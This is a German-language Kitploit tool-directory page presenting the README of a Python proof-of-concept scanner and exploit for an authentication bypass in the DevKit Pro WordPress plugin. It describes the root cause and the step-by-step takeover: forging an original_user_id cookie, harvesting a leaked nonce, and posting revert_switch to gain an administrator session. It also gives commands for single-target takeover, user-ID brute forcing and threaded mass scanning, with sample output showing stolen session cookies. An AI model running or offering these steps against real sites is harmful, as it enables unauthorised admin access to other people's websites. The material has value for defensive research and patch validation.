Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-19660 — Python-PoC-Scanner und Exploit für CVE-2026-14378, eine Pre-Auth-Übernahme der Administrator-Sitzung im DevKit Pro WordPress-Plugin über ein gefälschtes original_user_id-Cookie. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-19660
SchwachstellenscannerExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstestsAuthentifizierungRed Teaming
GitHubmurrez/cve-2026-19660

CVE-2026-19660

Python-PoC-Scanner und Exploit für CVE-2026-14378, eine Pre-Auth-Übernahme der Administrator-Sitzung im DevKit Pro WordPress-Plugin über ein gefälschtes original_user_id-Cookie.

1vor 20h 14mNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-14378 — DevKit Pro Authentifizierungsumgehung PoC

Proof-of-Concept-Scanner und Exploit-Helfer für CVE-2026-14378: unauthentifizierte Administrator-Session-Übernahme im WordPress-Plugin DevKit Pro (dplugins) durch einen fehlerhaften Benutzerwechsel-„Revert"-Flow.

Rechtliches: Nur auf Systemen verwenden, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff ist illegal. Dieses Repository dient der defensiven Forschung, Verifikation und Patch-Validierung.


GitHub-Repository-Beschreibung (zum Kopieren)

PoC for CVE-2026-14378: DevKit Pro ≤2.3.0 pre-auth admin takeover via forged original_user_id cookie + wp_footer revert_switch nonce. check/admin + mass scan.

Vorgeschlagene Themen: cve-2026-14378, wordpress, wordpress-exploit, devkit-pro, dplugins, authentication-bypass, poc, security-research


Schwachstelle auf einen Blick

CVECVE-2026-14378
ProduktDevKit Pro (Hersteller: dplugins)
TypAuthentifizierungsumgehung → vollständige Administrator-Session (CWE-287)
BetroffenAlle Versionen ≤ 2.3.0
Behoben3.0.0+ (Changelog)
CVSS 3.19.8 Kritisch — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence

Verwandter Advisory (gleiches Produkt, anderer Bug)

CVEProblemAuth
CVE-2026-14357Beliebige Theme-ZIP-Installation über DPDEV_install_themesSubscriber+
CVE-2026-14378Session-Übernahme über Benutzerwechsel-RevertKeine

Dieser PoC zielt nur auf 14378.


Ursache (technisch)

Der Users Manager von DevKit Pro kann Benutzer für Tests impersonieren. Wenn ein Administrator zu einem anderen Konto wechselt, speichert das Plugin die vorherige Identität in einem Client-Cookie:

  • original_user_id — Benutzer-ID des Kontos vor dem Wechsel

Wenn dieses Cookie vorhanden ist, rendert das Plugin ein „Zurückwechseln"-Steuerelement in wp_footer im Frontend, einschließlich eines WordPress-Nonces, der an die Revert-Aktion gebunden ist.

Der revert_switch-Handler (AJAX) ruft verify_nonce_and_capability() auf, was fälschlicherweise manage_options gegen den durch original_user_id referenzierten Benutzer prüft, anstatt current_user_can() auf den tatsächlichen Anfragenden (der möglicherweise völlig unauthentifiziert ist) anzuwenden.

Ein Angreifer kann:

  1. Cookie: original_user_id=<administrator_user_id> setzen (üblicherweise 1).
  2. Eine beliebige öffentliche Seite anfordern und den Footer nach dem Revert-Formular / Nonce parsen.
  3. POST an wp-admin/admin-ajax.php mit action=revert_switch (oder pluginspezifischem Alias) und dem geleakten Nonce senden.
  4. wp_set_auth_cookie() für die gefälschte Benutzer-ID auslösen → authentifizierte Administrator-Session.

Offizieller Feature-Kontext: Users Manager — switch back.


Angriffsablauf

sequenceDiagram
    participant A as Attacker
    participant W as WordPress (front end)
    participant P as DevKit Pro
    participant X as admin-ajax.php

    A->>W: GET / (Cookie: original_user_id=1)
    W->>P: wp_footer hook
    P-->>W: switch-back HTML + nonce
    W-->>A: page body contains nonce
    A->>X: POST action=revert_switch + nonce
    Note over P,X: capability checked for user 1, not attacker
    X-->>A: Set-Cookie wordpress_logged_in_*
    A->>W: GET /wp-admin/
    W-->>A: admin dashboard

Wann die Prüfung erfolgreich ist vs. fehlschlägt

Der check-Befehl ist absichtlich streng: Er meldet nur dann verwundbar, wenn ein Switch-Back-Nonce nach dem Fälschen von original_user_id erscheint.

BeobachtungWahrscheinliche Bedeutung
VULNERABLE — switch-back material leakedExploit-Pfad funktioniert wahrscheinlich; im Labor vor admin bestätigen.
not vulnerable (check): no switch-back nonce…Gepatchtes DevKit (≥ 3.0.0), Plugin nicht installiert, Users Manager deaktiviert (standardmäßig aus), benutzerdefinierter Plugin-Pfad, Cache/CDN entfernt Footer, oder falsche Site.
DevKit Pro readme not confirmedKein öffentlicher readme.txt-Fingerprint; Plugin kann dennoch vorhanden, aber verborgen sein — das Oracle bleibt der entscheidende Test.
DevKit Pro <= 2.3.0 suspected + weiterhin kein NonceVerwundbare Version kann installiert sein, aber Switch-Feature nicht aktiviert oder Footer wird auf getesteten URLs nicht gerendert.

Hinweis: Ein HTTP 200 auf /wp-content/plugins/.../readme.txt, das eine vollständige HTML-Seite zurückgibt, ist ein häufiger WordPress-Soft-404. Dieser PoC validiert den Readme-Inhalt (Plugin Name:-Header), nicht nur den Statuscode.


Anforderungen

  • Python 3.9+
  • requests
pip install requests

Optional: requirements.txt enthält ein festgelegtes Minimum:

requests>=2.28.0

Installation

git clone https://github.com/YOUR_USER/cve-2026-14378-poc.git
cd cve-2026-14378-poc
pip install -r requirements.txt   # or: pip install requests

Verwendung

Einzelnes Ziel — nur Erkennung (sicher)

Führt keine vollständige Übernahme durch; testet nur das Footer-Nonce-Oracle.

python poc.py check https://target.example/
python poc.py check https://target.example/ --user-id 2
python poc.py check https://target.example/ --timeout 40

Einzelnes Ziel — Session-Übernahme

Versucht vollständiges revert_switch und verifiziert /wp-admin/-Zugriff.

python poc.py admin https://target.example/
python poc.py admin https://target.example/ --user-id 1 --brute 5
python poc.py admin https://target.example/ --log successes.txt
FlagBeschreibung
--user-idAdministrator- (oder Ziel-)Benutzer-ID, die in original_user_id gefälscht wird (Standard: 1)
--bruteVersucht IDs 1..N, wenn die erste ID fehlschlägt
--timeoutHTTP-Timeout in Sekunden (Standard: 25)
--logHängt erfolgreiche admin-URLs an eine Datei an (Standard: logs.txt)

Massenscan (Listendatei)

Eine URL pro Zeile; #-Kommentare und zusätzliche Spalten nach Leerzeichen werden ignoriert.

# Detection only (recommended first pass)
python poc.py targets.txt

# Exploit attempts (authorized targets only)
python poc.py targets.txt admin

Wenn keine Datei als erstes Argument übergeben wird, fordert das Skript einen Listenpfad an (gleiches Verhalten wie Legacy-Massenscanner).

Der Massenmodus verwendet einen Thread-Pool (50 Worker). In poc.py anpassen, falls Rate-Limits erreicht werden.

Beispiel-Listendatei

# FOFA / manual imports
https://staging.example.com
example.org
192.0.2.10|wordpress|1.2.3   # only first token is used

Beispielausgabe

Verwundbar (check):

[*] https://vulnerable.example
[+] DevKit Pro <= 2.3.0 suspected (stable tag 2.3.0)
[+] VULNERABLE — switch-back material leaked (action=revert_switch, nonce=a1b2c3d4…)

Nicht verwundbar (typischer Massenscan):

[*] https://patched.example
[!] DevKit Pro readme not confirmed (hidden path, WAF, or plugin absent)
[-] not vulnerable (check): no switch-back nonce in wp_footer with forged original_user_id cookie — patched DevKit, Users Manager off, or wrong target

Erfolgreicher Admin:

[*] https://lab.local
[+] https://lab.local -> administrator session as user_id=1
[+] cookie: wordpress_logged_in_…=…

Implementierungshinweise

Tool herunterladen